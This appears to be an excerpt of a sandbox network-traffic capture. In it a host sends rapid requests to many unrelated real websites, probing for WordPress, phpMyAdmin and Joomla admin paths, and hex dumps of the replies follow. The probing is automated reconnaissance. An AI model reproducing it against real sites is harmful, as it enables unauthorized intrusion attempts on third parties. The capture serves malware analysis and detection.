2024-02-20 23:26:15 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:15 UTC	464	IN	Data Raw: 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 Data Ascii: lock-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8
2024-02-20 23:26:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:15 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f Data Ascii: 2000ng-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-blo
2024-02-20 23:26:15 UTC	6	IN	Data Raw: 61 79 2d 62 6f 72 Data Ascii: ay-bor
2024-02-20 23:26:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:15 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 Data Ascii: 2000der-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important
2024-02-20 23:26:15 UTC	6	IN	Data Raw: 61 6c 2d 63 6f 6c Data Ascii: al-col
2024-02-20 23:26:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:15 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 Data Ascii: 2000or-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.6	63908	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:14 UTC	211	OUT	GET /wp-admin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://m-viper.de/wp-login.php
2024-02-20 23:26:15 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:14 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:15 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.6	63393	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	266	OUT	GET /wp-admin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://strategicimpact.com.au/wp-login.php
2024-02-20 23:26:15 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:15 GMT Connection: close
2024-02-20 23:26:15 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.6	63652	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	182	OUT	GET /phpmyadmin HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	418	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Cache-Control: no-cache, private Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:15 UTC	7	IN	Data Raw: 31 62 66 63 65 0d 0a Data Ascii: 1bfce
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 30 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 20 70 61 67 69 6e 61 20 6e 6f 6e 20 c3 a8 20 73 74 61 Data Ascii: <!doctype html><html lang="it" style="visibility:hidden;opacity:0;"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>La pagina non sta
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 34 37 2c 30 6c 30 2c 32 31 2e 33 31 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 30 2e 35 36 36 63 30 2c 2d 32 2e 37 38 39 20 30 2e 35 31 35 2c 2d 35 2e 34 38 38 20 33 2e 39 37 38 2c 2d 35 2e 34 38 38 63 33 2e 34 36 33 2c 30 20 33 2e 34 32 37 2c 33 2e 31 39 37 20 33 2e 34 32 37 2c 35 2e 36 36 35 6c 30 2c 31 30 2e 33 38 39 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 31 2e 37 32 31 63 30 2c 2d 35 2e 37 33 36 20 2d 31 2e 32 32 35 2c 2d 31 30 2e 31 35 37 20 2d 37 2e 39 33 38 2c 2d 31 30 2e 31 35 37 5a 6d 2d 32 30 2e 31 39 31 2c 2d 31 30 2e 30 38 37 63 2d 30 2e 30 30 36 2c 30 20 2d 30 2e 30 31 32 2c 30 20 2d 30 2e 30 31 37 2c 30 63 2d 32 2e 31 31 34 2c 30 20 2d 33 2e 38 35 34 2c 31 2e 37 34 20 2d 33 2e 38 35 34 2c 33 2e 38 35 34 63 30 2c 32 2e 31 31 33 20 31 2e 37 34 2c Data Ascii: 47,0l0,21.31l6.624,0l0,-10.566c0,-2.789 0.515,-5.488 3.978,-5.488c3.463,0 3.427,3.197 3.427,5.665l0,10.389l6.624,0l0,-11.721c0,-5.736 -1.225,-10.157 -7.938,-10.157Zm-20.191,-10.087c-0.006,0 -0.012,0 -0.017,0c-2.114,0 -3.854,1.74 -3.854,3.854c0,2.113 1.74,
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 35 2e 33 39 2c 30 63 2d 30 2e 36 36 34 2c 2d 31 2e 38 35 39 20 2d 32 2e 34 32 33 2c 2d 33 2e 32 20 2d 34 2e 35 30 36 2c 2d 33 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 31 2e 38 39 36 2c 30 6c 30 2c 2d 31 2e 36 63 30 2c 2d 31 2e 37 36 36 20 31 2e 34 33 35 2c 2d 33 2e 32 20 33 2e 32 2c 2d 33 2e 32 6c 32 32 2e 32 37 32 2c 30 63 30 2e 30 37 35 2c 30 2e 35 32 35 20 30 2e 31 32 38 2c 31 2e 30 35 36 20 30 2e 31 32 38 2c 31 2e 36 6c 30 2c 33 2e 32 5a 22 0a 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 22 20 2f 3e 0a 20 20 20 20 Data Ascii: .2c-2.083,0 -3.842,1.341 -4.504,3.2l-5.39,0c-0.664,-1.859 -2.423,-3.2 -4.506,-3.2c-2.083,0 -3.842,1.341 -4.504,3.2l-1.896,0l0,-1.6c0,-1.766 1.435,-3.2 3.2,-3.2l22.272,0c0.075,0.525 0.128,1.056 0.128,1.6l0,3.2Z" style="fill-rule:nonzero;" />
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 22 4d 32 32 2e 34 32 2c 30 6c 36 2e 36 37 31 2c 36 2e 36 37 31 6c 30 2c 32 32 2e 34 32 63 30 2c 31 2e 36 30 36 20 2d 31 2e 33 30 35 2c 32 2e 39 30 39 20 2d 32 2e 39 30 39 2c 32 2e 39 30 39 6c 2d 32 30 2e 33 36 34 2c 30 63 2d 31 2e 36 30 34 2c 30 20 2d 32 2e 39 30 39 2c 2d 31 2e 33 30 33 20 2d 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 30 2c 2d 32 36 2e 31 38 32 63 30 2c 2d 31 2e 36 30 34 20 31 2e 33 30 35 2c 2d 32 2e 39 30 39 20 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 31 36 2e 36 30 32 2c 30 5a 6d 33 2e 37 36 33 2c 32 39 2e 30 39 31 6c 2d 30 2e 30 30 31 2c 2d 32 30 2e 33 36 34 6c 2d 35 2e 38 31 38 2c 30 6c 30 2c 2d 35 2e 38 31 38 6c 2d 31 34 2e 35 34 36 2c 30 6c 30 2c 32 36 2e 31 38 32 6c 32 30 2e 33 36 35 2c 30 5a 6d 2d 31 33 2e 30 39 32 2c 2d 32 2e 39 30 39 Data Ascii: "M22.42,0l6.671,6.671l0,22.42c0,1.606 -1.305,2.909 -2.909,2.909l-20.364,0c-1.604,0 -2.909,-1.303 -2.909,-2.909l0,-26.182c0,-1.604 1.305,-2.909 2.909,-2.909l16.602,0Zm3.763,29.091l-0.001,-20.364l-5.818,0l0,-5.818l-14.546,0l0,26.182l20.365,0Zm-13.092,-2.909
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 6f 66 66 65 72 74 61 2d 66 6f 72 6d 61 74 69 76 61 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4f 66 66 65 72 74 61 20 66 6f 72 6d 61 74 69 76 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 73 63 68 65 64 65 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4c 65 20 73 63 68 65 64 65 20 64 69 64 61 74 Data Ascii: href="/didattica/offerta-formativa" tabindex="-1">Offerta formativa</a> </li> <li > <a href="/didattica/schede" tabindex="-1">Le schede didat
2024-02-20 23:26:15 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 61 64 67 65 20 62 61 64 67 65 2d 73 6d 20 62 61 64 67 65 2d 70 69 6c 6c 20 62 61 64 67 65 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 22 20 6e 61 6d 65 3d 22 63 65 72 63 61 22 20 76 61 6c 75 65 3d 22 41 6c 75 6e 6e 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 6c 75 6e 6e 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a Data Ascii: <button type="submit" class="badge badge-sm badge-pill badge-outline-primary" name="cerca" value="Alunni"> Alunni </button>
2024-02-20 23:26:15 UTC	16334	IN	Data Raw: 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 20 2d 20 6c 69 6e 6b 20 65 73 74 65 72 6e 6f 20 2d 20 61 70 65 72 74 75 72 61 20 6e 75 6f 76 61 20 73 63 68 65 64 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 61 6c 74 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 22 20 73 72 63 3d 22 2f 61 6c 6c 65 67 61 74 69 2f 62 61 Data Ascii: ener noreferrer" aria-label="Albo online - link esterno - apertura nuova scheda"> ... <div class="icon d-inline-block"> <img class="img-fluid" alt="Albo online" src="/allegati/ba
2024-02-20 23:26:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.6	63653	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/phpmyadmin/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.6	63750	208.109.43.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	179	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:15 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.6	63858	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	185	OUT	GET /administrator/ HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	358	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:16 UTC	16026	IN	Data Raw: 31 64 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 Data Ascii: 1d18<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... T
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 37 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2e 77 69 64 67 65 74 